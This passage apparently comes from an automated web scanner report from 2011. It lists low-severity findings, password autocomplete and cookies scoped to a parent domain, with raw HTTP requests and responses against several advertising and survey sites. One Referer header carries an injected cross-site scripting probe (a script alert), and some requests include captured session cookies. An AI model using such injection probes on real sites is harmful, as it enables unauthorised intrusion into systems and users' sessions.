The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


13.1. http://www.peopleschoice.com/pca/polls/poll.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.peopleschoice.com
Path:   /pca/polls/poll.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /pca/polls/poll.jsp?pollId=1000000270 HTTP/1.1
Host: www.peopleschoice.com
Proxy-Connection: keep-alive
Referer: http://wonderwall.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:09:44 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
X-Powered-By: JSF/1.2
Content-Type: text/html;charset=UTF-8
Via: 1.1 pca-www-01.sparkred.com
Vary: Accept-Encoding
Content-Length: 27072
Connection: close

<!DOCTYPE composition PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebo
...[SNIP]...
<div id="pca-hidden-login-controls">
       <form method="post">
               <label for="username" style="display: none;">
...[SNIP]...
</label><input name="password" id="password" maxlength="35" tabindex="2" type="password" style="display: none;" />    
               <input alt="Login" class="login" id="loginbutton" src="/pca/img/pca_login_submit.png" tabindex="4" title="Login" type="image" />
...[SNIP]...

13.2. http://www.peopleschoice.com/pca/vote/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.peopleschoice.com
Path:   /pca/vote/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /pca/vote/ HTTP/1.1
Host: www.peopleschoice.com
Proxy-Connection: keep-alive
Referer: http://www.peopleschoice.com/pca/polls/poll.jsp?pollId=1000000270
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2; __utma=61498413.1690544870.1316282695.1316282695.1316282695.1; __utmb=61498413; __utmc=61498413; __utmz=61498413.1316282695.1.1.utmccn=(referral)|utmcsr=wonderwall.msn.com|utmcct=/|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:04:13 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
X-Powered-By: JSF/1.2
Content-Type: text/html;charset=UTF-8
Via: 1.1 pca-www-01.sparkred.com
Vary: Accept-Encoding
Connection: close
Content-Length: 12819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   
   <head>
...[SNIP]...
<div id="pca-hidden-login-controls">
       <form method="post">
               <label for="username" style="display: none;">
...[SNIP]...
</label><input name="password" id="password" maxlength="35" tabindex="2" type="password" style="display: none;" />    
               <input alt="Login" class="login" id="loginbutton" src="/pca/img/pca_login_submit.png" tabindex="4" title="Login" type="image" />
...[SNIP]...

14. Cookie scoped to parent domain  previous  next
There are 19 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


14.1. http://adserver.teracent.net/tase/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/ad?AdBoxType=16&url=nissan.dfa&inv=doubleclick&rnd=1316283170160&esc=0&CustomQuery=dcp%3Domd%26oem%3Dnissan%26eaid%3D242388130%26epid%3D61484958%26esid%3D598068%26ecid%3D43899957%26campId%3D5290464%26model%3DAS%26 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316221548509_135234331_as3100_vew|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316265127233_137611811_as3107_imp|308#1316265127233_137611811_as3107_imp|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 13:12:07 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 13:12:06 GMT
Content-Length: 3406

resourceServer=http%3A%2F%2Fpcdn.tcgmsrv.net%2Ftase&eventId=1316265127233_137611811_as3107_imp&responseStatus=0&eventUrl=http%3A%2F%2Fadserver.teracent.net%2Ftase%2Fredir%2F1316265127233_137611811_as3
...[SNIP]...

14.2. http://adserver.teracent.net/tase/redir/1316265127233_137611811_as3107_imp/vew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1316265127233_137611811_as3107_imp/vew

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1316265127233_137611811_as3107_imp/vew?q=H4sIAAAAAAAAAFWQMU_EMAyF_4pjx4kjZffUAQYk0LViZEKkXHWMVWlQBW3vr-OeWNjyLL_3vvhhe_zZyvCR7_b3YRuvVV_LsOQnTi4IBGqCJ2JiaW6T6FwTKdoD5KRLzYBg2gMFQuwAQwRIAN3YI7jQLWvR8mVbDiJ4ChGFtc_urwWYJUamBjwmNF9zTBKITTiyFzlarpdc9_PnNk_bMn3rkImTZ4YoAULQpbcgtAQSOUyhudUFD4ZCcijb9AkjsD-U-EhCgogn3cplzuSM2EkHoXOuc6mDpOP5oGZjAB8sW0tGl_Qtz5N9mzEZmw-tzsWkJScWn1qdxrW81OxJnLG0uu513vLzfat1Knlfa6v7vObr0vfj1dy9ub0kF807jybs2JiSVevQ_7-u_gK9m_7CrAEAAA==&act=vew&idx=[0]&rnd=2023178134&no_ack=1&eventType=countOnCreative&eventOn=creative HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316265127233_137611811_as3107_imp|308#1316265127233_137611811_as3107_imp|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 204 No Content
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316265127425_137664789_as3101_vew|308#1316265127233_137611811_as3107_imp|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 13:12:07 GMT; Path=/tase
Date: Sat, 17 Sep 2011 13:12:07 GMT


14.3. http://amch.questionmarket.com/adsc/d913131/10/400008095899/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d913131/10/400008095899/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d913131/10/400008095899/decide.php?ord=1316288110 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc=
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:37 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: CS1=deleted; expires=Fri, 17 Sep 2010 14:37:36 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-17d1a66403974a1bf62d24ec5_43741102-3-54_400008095899-10-1; expires=Wed, 07 Nov 2012 06:37:37 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_913131-G*?|M-0; expires=Wed, 07-Nov-2012 06:37:37 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.4. http://amch.questionmarket.com/adsc/d913132/5/400008029877/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d913132/5/400008029877/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d913132/5/400008029877/decide.php?ord=1316282753 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://img.mediaplex.com/content/0/16161/131484/CBD_P3Student_Product_Like_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131484-27909-2%3Fmpt%3D%5B555223779ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913132%26site%3D16161131484279092%26code%3D8029877%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1057913%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D16161131484279092%26advid%3D421303%26sid%3D16161131484279092%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcampid%3D133016%26crid%3D8029877%26plid%3D16161131484279092&mpt=[555223779ER]&mpvc=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:05:11 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b203.dl
Set-Cookie: CS1=deleted; expires=Fri, 17 Sep 2010 13:05:10 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1; expires=Wed, 07 Nov 2012 05:05:11 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-0_913132-c5?|M-0; expires=Wed, 07-Nov-2012 05:05:11 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.5. http://amch.questionmarket.com/adsc/d917547/10/43064321/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d917547/10/43064321/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d917547/10/43064321/decide.php?ord=1316287903 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://answerology.delish.com/index.aspx?template=login.ascx&nextTemplate=home.ascxe81bd%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E384de482b57
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:35:52 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b102.dl
Set-Cookie: CS1=deleted; expires=Fri, 17 Sep 2010 14:35:51 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1%5D%5D%3E%3E_43741102-3-7_43064321-10-1; expires=Wed, 07 Nov 2012 06:35:52 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_924563-`#?|M-0_913131-y'?|M-0_917547-Q#?|M-x3; expires=Wed, 07-Nov-2012 06:35:52 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.6. http://amch.questionmarket.com/adsc/d924563/3/43741102/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d924563/3/43741102/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d924563/3/43741102/decide.php?ord=1316287868 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-0_913132-c5?|M-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:34:02 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC"
DL_S: a203
Set-Cookie: CS1=deleted; expires=Fri, 17-Sep-2010 14:34:01 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-2_400008095899-10-1; expires=Wed, 07-Nov-2012 06:34:02 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_913131-y'?|M-0_924563-`#?|M-(1; expires=Wed, 07-Nov-2012 06:34:02 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.7. http://amch.questionmarket.com/adsc/d924563/3/43741105/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d924563/3/43741105/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d924563/3/43741105/decide.php?ord=1316281820 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:02:56 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b101.dl
Set-Cookie: CS1=deleted; expires=Fri, 17 Sep 2010 13:02:55 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-2_924563-1-4; expires=Wed, 07 Nov 2012 05:02:56 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_924563-#^>|M-D9; expires=Wed, 07-Nov-2012 05:02:56 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.8. http://amch.questionmarket.com/adscgen/dynamiclink.js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:37:40 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b203.dl
Set-Cookie: LP=1316270260; expires=Wed, 21 Sep 2011 18:37:40 GMT; path=/; domain=.questionmarket.com
Content-Length: 875
Content-Type: text/html

if (!window.DL_already_ran) (function(){
var d,e,h=false,s="http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_
...[SNIP]...

14.9. http://amch.questionmarket.com/adscgen/surv_lastpage_disq.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/surv_lastpage_disq.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adscgen/surv_lastpage_disq.php?p1=Click+to+Close&p2=Continue+to+your+destination HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://survey.questionmarket.com/surv/925590/newai.php?ai_id=326080549&site=5&from_aicode=922738&continue_to=&yob=12&age=99&country=38&dq_history=913131,10&tmplt=
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270054; veranda_sess=survey_num%3D913131%2Cmember_id%3D326080549%2Cfrom_site%3D10%2Cfrom_aicode%3D922738%2Ctime%3D1316270056; ST=913131_

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 14:41:40 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Set-Cookie: veranda_ses=deleted; expires=Fri, 17 Sep 2010 14:41:39 GMT; path=/; domain=.questionmarket.com
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 354
Content-Type: text/html

(function(){
if (self==top) {
   if (window.opener)
       document.write('<a href="javascript:window.close()">Click to Close</a>');
} else {
       document.write('<a href="http://amch.questionmarket.com/adscgen
...[SNIP]...

14.10. http://amch.questionmarket.com/surveyf/nav.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /surveyf/nav.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /surveyf/nav.php?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A%2F%2Fwww.delish.com%2Fsearch%2Ffast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26
